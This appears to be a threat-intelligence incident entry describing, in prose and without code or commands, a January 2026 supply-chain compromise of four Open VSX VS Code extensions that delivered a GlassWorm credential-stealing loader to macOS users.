Cyber Incident Victim: Open VSX
Date:
Jan 2026
Location:
Canada
Summary
A threat actor compromised a publisher account on the Open VSX marketplace and uploaded malicious updates to four established VS Code extensions that together have over 22,000 downloads. The poisoned extensions contain a GlassWorm loader that runs at runtime, avoids systems with Russian locales, retrieves command‑and‑control data from Solana transaction memos and executes additional code. The loader targets macOS, profiles the host, fetches a Node.js JavaScript implant from the memo and steals browser cookies, history, login files, wallet data, macOS keychain, Apple Notes, FortiClient VPN information and documents from Desktop, Documents and Downloads, focusing on developer credentials such as AWS and SSH details to enable further compromise.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 1 technique |
| Threat Actors | Type | Location |
|---|---|---|
| 0 actors | Available to members | Available to members |
Description
On January 30 2026 a threat actor compromised an established publisher account on the Open VSX marketplace and uploaded malicious updates to four widely used Visual Studio Code extensions that together had accumulated more than twenty‑two thousand downloads. The compromised account had a history of publishing multiple extensions and showed strong adoption signals across ecosystems, which allowed the attacker to bypass typical defenses that rely on detecting typosquatted or cloned tools. Open VSX security analysts identified the poisoned updates as part of a fresh GlassWorm campaign, noting that the attack did not involve the creation of new publisher identities but rather the abuse of legitimate credentials. The extensions contained runtime‑executable code designed to evade detection on systems with Russian locales and to retrieve command‑and‑control instructions from memos embedded in Solana blockchain transactions.
Once executed on a macOS host, the loader hidden in each extension’s extension.js file performed a system profile check and proceeded only if the operating system matched its target. A second‑stage Node.js JavaScript implant then activated, seeking to harvest sensitive data from browsers such as Firefox and Chrome‑based variants, including cookies, form history, login files and wallet‑extension artifacts. The malware also scanned for Safari cookies, desktop cryptocurrency wallets, the macOS keychain, Apple Notes and FortiClient VPN data, and gathered documents from the Desktop, Documents and Downloads folders before staging the collected information for exfiltration to hardcoded external destinations. Socket researchers emphasized that the implant specifically sought developer credentials and configuration files, such as AWS and SSH keys, thereby increasing the risk of account compromise and lateral movement within affected networks.
In response to the incident, the Open VSX security team assessed the breach as consistent with leaked publishing tokens or other unauthorized access to the compromised account, indicating that the attacker gained illegitimate upload privileges rather than creating a new publisher identity. The team’s analysis highlighted the escalation of supply chain abuse on Open VSX, noting how the threat actor blended malicious activity into normal developer workflows, used encrypted runtime‑decrypted loaders to hide execution, and leveraged Solana memos as a dynamic dead drop to rotate infrastructure without needing to republish the extensions. No further details about remediation steps, takedown actions or user notifications were provided in the source material.